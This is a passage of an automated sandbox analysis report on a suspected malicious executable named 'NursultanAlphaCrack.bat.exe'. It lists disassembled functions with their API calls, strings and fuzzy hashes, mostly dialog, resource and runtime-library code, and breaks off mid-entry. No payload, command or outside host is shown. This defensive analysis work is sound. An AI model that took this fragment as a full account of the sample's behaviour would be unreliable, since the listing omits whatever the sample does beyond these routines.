Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: cf5c17bb0caa171b2c8f90225cd735040701b31ffa630c66e8dfd92ed091039a
Instruction ID: f93f778b702192cbf12b040de726781f8c113bb0ef148cdb921be032a5f3cafd
Opcode Fuzzy Hash: cf5c17bb0caa171b2c8f90225cd735040701b31ffa630c66e8dfd92ed091039a
Instruction Fuzzy Hash: E841C231404259A6CF21AF60CC83FEA77A9AF64395F00442AF924E3151DBB5DE908A64

Function 001DB270 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 001C1316: GetDlgItem.USER32(00000000,00003021), ref: 001C135A
Part of subcall function 001C1316: SetWindowTextW.USER32(00000000,001F35F4), ref: 001C1370

EndDialog.USER32(?,00000001), ref: 001DB2BE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 001DB2D6
SetDlgItemTextW.USER32(?,00000067,?), ref: 001DB304

Strings

xz!, xrefs: 001DB2E2
GETPASSWORD1, xrefs: 001DB289

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1$xz!
API String ID: 445417207-1603523493
Opcode ID: 3e097fe47781dfb97143b74b26fca7c9c3022aec34bf4f7a388a55f43ada17bf
Instruction ID: bd44e552e00d84e9ed29e35bbb95832f2064ee87facaa076bbe799733ce70382
Opcode Fuzzy Hash: 3e097fe47781dfb97143b74b26fca7c9c3022aec34bf4f7a388a55f43ada17bf
Instruction Fuzzy Hash: B7110833944118F6DB219EA4AC89FFF376DFF69710F010026FA46B2280C7A4EA419771

Function 001DB6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 001DB6ED
GetObjectW.GDI32(00000000,00000018,?), ref: 001DB712
DeleteObject.GDI32(00000000), ref: 001DB744
DeleteObject.GDI32(00000000), ref: 001DB767

Part of subcall function 001DA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,001DB73D,00000066), ref: 001DA6D5
Part of subcall function 001DA6C2: SizeofResource.KERNEL32(00000000,?,?,?,001DB73D,00000066), ref: 001DA6EC
Part of subcall function 001DA6C2: LoadResource.KERNEL32(00000000,?,?,?,001DB73D,00000066), ref: 001DA703
Part of subcall function 001DA6C2: LockResource.KERNEL32(00000000,?,?,?,001DB73D,00000066), ref: 001DA712
Part of subcall function 001DA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,001DB73D,00000066), ref: 001DA72D
Part of subcall function 001DA6C2: GlobalLock.KERNEL32(00000000), ref: 001DA73E
Part of subcall function 001DA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 001DA762
Part of subcall function 001DA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 001DA7A7
Part of subcall function 001DA6C2: GlobalUnlock.KERNEL32(00000000), ref: 001DA7C6
Part of subcall function 001DA6C2: GlobalFree.KERNEL32(00000000), ref: 001DA7CD

Strings

], xrefs: 001DB71A

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
String ID: ]
API String ID: 1797374341-3352871620
Opcode ID: db807cdef55f2a07eded2f9948a586fdfab70daf0c8d2215dcb261ebe9f0750c
Instruction ID: 1d1f32f47ee457e2be4c3192f1584251a622491803e4360c7b1557c5c580e737
Opcode Fuzzy Hash: db807cdef55f2a07eded2f9948a586fdfab70daf0c8d2215dcb261ebe9f0750c
Instruction Fuzzy Hash: 4701C436940211A7C721B7746C49A7F7A7AAFC0752F0A0016F901A7391DF25CE064272

Function 001DD600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 001C1316: GetDlgItem.USER32(00000000,00003021), ref: 001C135A
Part of subcall function 001C1316: SetWindowTextW.USER32(00000000,001F35F4), ref: 001C1370

EndDialog.USER32(?,00000001), ref: 001DD64B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 001DD661
SetDlgItemTextW.USER32(?,00000066,?), ref: 001DD675
SetDlgItemTextW.USER32(?,00000068), ref: 001DD684

Strings

RENAMEDLG, xrefs: 001DD618

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: f45233917aa9e86084e76bb1337127f0acf9b2c16f967eb02d9c690deb79bf5a
Instruction ID: 9a412aff7b07fb660ba13167cb09780f0acd6290997c121e1b62edbc8548b3fe
Opcode Fuzzy Hash: f45233917aa9e86084e76bb1337127f0acf9b2c16f967eb02d9c690deb79bf5a
Instruction Fuzzy Hash: CA01D833284214BAD2318FA4BE0DFA7775EEB6AB41F114412F305A21D0CBA6EA0597F5

Function 001E7E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,001E7E24,00000000,?,001E7DC4,00000000,001FC300,0000000C,001E7F1B,00000000,00000002), ref: 001E7E93
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001E7EA6
FreeLibrary.KERNEL32(00000000,?,?,?,001E7E24,00000000,?,001E7DC4,00000000,001FC300,0000000C,001E7F1B,00000000,00000002), ref: 001E7EC9

Strings

CorExitProcess, xrefs: 001E7E9E
mscoree.dll, xrefs: 001E7E8C

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 42eea642a899120946e500c1b7b632f7dbea3e96ad03588b9c4caef123a0f3ee
Instruction ID: 79e0c28974205761cfa652cb4d33d13276e33e198b76382e8073763a528a60eb
Opcode Fuzzy Hash: 42eea642a899120946e500c1b7b632f7dbea3e96ad03588b9c4caef123a0f3ee
Instruction Fuzzy Hash: BEF0683190460CBBDB15AFA1DC09BBEBFB4EF44711F0041A9F815A22A0DB309E80CB90

Function 001CF2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 001D081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001D0836
Part of subcall function 001D081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,001CF2D8,Crypt32.dll,00000000,001CF35C,?,?,001CF33E,?,?,?), ref: 001D0858

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 001CF2E4
GetProcAddress.KERNEL32(002081C8,CryptUnprotectMemory), ref: 001CF2F4

Strings

CryptUnprotectMemory, xrefs: 001CF2EA
CryptProtectMemory, xrefs: 001CF2DE
Crypt32.dll, xrefs: 001CF2CE

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 990c22c81df2d3a69aeb1f257c5c018d8918ae99f1b235b2ae50f12f05bd99c3
Instruction ID: 318e2d65468ce2505a0bca7c0e98a96d09452abd201e5a6c8e305316a1b41985
Opcode Fuzzy Hash: 990c22c81df2d3a69aeb1f257c5c018d8918ae99f1b235b2ae50f12f05bd99c3
Instruction Fuzzy Hash: A6E08C70911756AECB219F3A984DB22BED46F28700F14886EF1EBE3B40DBB4D581CB50

Function 001E2BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 001E2CA1
___AdjustPointer.LIBCMT ref: 001E2CC4
_abort.LIBCMT ref: 001E2D12
___AdjustPointer.LIBCMT ref: 001E2D60

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: 85191358527fd28214a395b9f67b7bd6fd048d705192480ea4345f7f6b699fb3
Instruction ID: c85b6d10586a676cec672ae8150771dfa80e967e6c221847d433892fef5838a8
Opcode Fuzzy Hash: 85191358527fd28214a395b9f67b7bd6fd048d705192480ea4345f7f6b699fb3
Instruction Fuzzy Hash: F2510371500A86AFDB298F96DC65BBE73A9FF24300F34412DE906472A1D771ED80D790

Function 001EBF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 001EBF39
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001EBF5C

Part of subcall function 001E8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,001ECA2C,00000000,?,001E6CBE,?,00000008,?,001E91E0,?,?,?), ref: 001E8E38

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 001EBF82
_free.LIBCMT ref: 001EBF95
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001EBFA4

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: ee60c2b60176785acf6ecb038039ad9c39411ee703c21685904edc6eeed39789
Instruction ID: e6eca985d3bddf38940c6c0d0b3b1d1ca0a8f6b70e6269e3b66b38ad2d8a9be2
Opcode Fuzzy Hash: ee60c2b60176785acf6ecb038039ad9c39411ee703c21685904edc6eeed39789
Instruction Fuzzy Hash: D8018472609A957F272116B75CCDC7F7A6DEEC2BA13290129F908D2141EF60CD02D5B0

Function 001E9869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00201030,00000200,001E91AD,001E617E,?,?,?,?,001CD984,?,?,?,00000004,001CD710,?), ref: 001E986E
_free.LIBCMT ref: 001E98A3
_free.LIBCMT ref: 001E98CA
SetLastError.KERNEL32(00000000,001F3A34,00000050,00201030), ref: 001E98D7
SetLastError.KERNEL32(00000000,001F3A34,00000050,00201030), ref: 001E98E0

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: a7b37bf07c447119e33f3d6f37729e787e1f56bc3f75b4d396784acd7dda23bd
Instruction ID: f655101bf77df1b08ebeb91cddeebbb0cff8ee865c7c9865bb469834dbac4d59
Opcode Fuzzy Hash: a7b37bf07c447119e33f3d6f37729e787e1f56bc3f75b4d396784acd7dda23bd
Instruction Fuzzy Hash: BB01F436144E896BC32623677C85D2F256DEFE37707250235F919921B2FF618C429261

Function 001D0EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 001D11CF: ResetEvent.KERNEL32(?), ref: 001D11E1
Part of subcall function 001D11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 001D11F5

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 001D0F21
CloseHandle.KERNEL32(?,?), ref: 001D0F3B
DeleteCriticalSection.KERNEL32(?), ref: 001D0F54
CloseHandle.KERNEL32(?), ref: 001D0F60
CloseHandle.KERNEL32(?), ref: 001D0F6C

Part of subcall function 001D0FE4: WaitForSingleObject.KERNEL32(?,000000FF,001D1206,?), ref: 001D0FEA
Part of subcall function 001D0FE4: GetLastError.KERNEL32(?), ref: 001D0FF6

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 2e33ad5406955c77d70af45347306b3ea2d8cdf9c7b828a30f9b54bc37240878
Instruction ID: 4b13c5be0657d22c292757e9ce8f26f25c75a16595793fdab006e0b7d8eed9ae
Opcode Fuzzy Hash: 2e33ad5406955c77d70af45347306b3ea2d8cdf9c7b828a30f9b54bc37240878
Instruction Fuzzy Hash: CB017172500744FFC722AB64DC84FD6FBAAFB08710F10092AF26B92660CB757A84CB50

Function 001EC7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 001EC817

Part of subcall function 001E8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,001EC896,001F3A34,00000000,001F3A34,00000000,?,001EC8BD,001F3A34,00000007,001F3A34,?,001ECCBA,001F3A34), ref: 001E8DE2
Part of subcall function 001E8DCC: GetLastError.KERNEL32(001F3A34,?,001EC896,001F3A34,00000000,001F3A34,00000000,?,001EC8BD,001F3A34,00000007,001F3A34,?,001ECCBA,001F3A34,001F3A34), ref: 001E8DF4

_free.LIBCMT ref: 001EC829
_free.LIBCMT ref: 001EC83B
_free.LIBCMT ref: 001EC84D
_free.LIBCMT ref: 001EC85F

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 79453feee8310de72d3ec33666675200d382216395a6c4277618d99987ee895b
Instruction ID: b59fcec40a5029b661113b4f226cce5b4808a177b799c1084ff69c78aa280dde
Opcode Fuzzy Hash: 79453feee8310de72d3ec33666675200d382216395a6c4277618d99987ee895b
Instruction Fuzzy Hash: 65F01232504A81AB8624DBAAFD85C1E73EABB20B147581819F148D7962CB71FC81CA94

Function 001D1FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 001D1FE5
_wcslen.LIBCMT ref: 001D1FF6
_wcslen.LIBCMT ref: 001D2006
_wcslen.LIBCMT ref: 001D2014
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,001CB371,?,?,00000000,?,?,?), ref: 001D202F

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: 0a44259fcc40b2675d778b374784ef74bb90b11fe6450331fc6215f9a98e2e71
Instruction ID: f8fd3ed8f4a1cb1d05ef3510fb5d9e2e99ab0324441fd3569eb048dc0afe8231
Opcode Fuzzy Hash: 0a44259fcc40b2675d778b374784ef74bb90b11fe6450331fc6215f9a98e2e71
Instruction Fuzzy Hash: 17F03032008064BFCF265F51EC09DDE7F66EB54770B218416F63A5B061CB72D6A1D6D0

Function 001E8900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001E891E

Part of subcall function 001E8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,001EC896,001F3A34,00000000,001F3A34,00000000,?,001EC8BD,001F3A34,00000007,001F3A34,?,001ECCBA,001F3A34), ref: 001E8DE2
Part of subcall function 001E8DCC: GetLastError.KERNEL32(001F3A34,?,001EC896,001F3A34,00000000,001F3A34,00000000,?,001EC8BD,001F3A34,00000007,001F3A34,?,001ECCBA,001F3A34,001F3A34), ref: 001E8DF4

_free.LIBCMT ref: 001E8930
_free.LIBCMT ref: 001E8943
_free.LIBCMT ref: 001E8954
_free.LIBCMT ref: 001E8965

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 41c95543f7fb210068ba3230d5ce888b2a0a68418271a59e6c1de20ebfb7c569
Instruction ID: 04b68c2f65c4ca240d62ea3e3816f30188d73f75308fe0524cf8daed68b1b1e8
Opcode Fuzzy Hash: 41c95543f7fb210068ba3230d5ce888b2a0a68418271a59e6c1de20ebfb7c569
Instruction Fuzzy Hash: A6F03A72810962FB872A6F96FC0642D3BA6F7247143452606F519962B2CB338986DB92

Function 001D15FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 001D17BC
_swprintf.LIBCMT ref: 001D186B

Strings

%s: %s, xrefs: 001D17CB
%ls, xrefs: 001D1641, 001D1657

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: 4ef2543e2d20c7b93c56d2cfe381684f230aa59ae3cce0c513fc577fc0704a8d
Instruction ID: 435b6ea55b3e6152dd52b2d140f761267028941db0ff0a73ad81ae4545361b9e
Opcode Fuzzy Hash: 4ef2543e2d20c7b93c56d2cfe381684f230aa59ae3cce0c513fc577fc0704a8d
Instruction Fuzzy Hash: AD510B352C8304F6FA295AE08D46F36B365BB25B04F25450BF386646E1EBF2E450B71B

Function 001E7F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe,00000104), ref: 001E7FAE
_free.LIBCMT ref: 001E8079
_free.LIBCMT ref: 001E8083

Strings

C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe, xrefs: 001E7FA5, 001E7FAC, 001E7FDB, 001E8013

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe
API String ID: 2506810119-1521777293
Opcode ID: 56b518d9c9598d8727fcfea44f6f8070a56f1f625369d89d5bf583756a58e4c6
Instruction ID: 61e03d03376fee098207d642f343707ee9b50bc17851f835b569379a8df1baa1
Opcode Fuzzy Hash: 56b518d9c9598d8727fcfea44f6f8070a56f1f625369d89d5bf583756a58e4c6
Instruction Fuzzy Hash: 0531A071A00A98FFDB25DF96D8849AEBBBCEB94310F144066F80897211DB718A45CB61

Function 001E31D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 001E31FB
_abort.LIBCMT ref: 001E3306

Strings

MOC, xrefs: 001E320D
RCC, xrefs: 001E3215

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

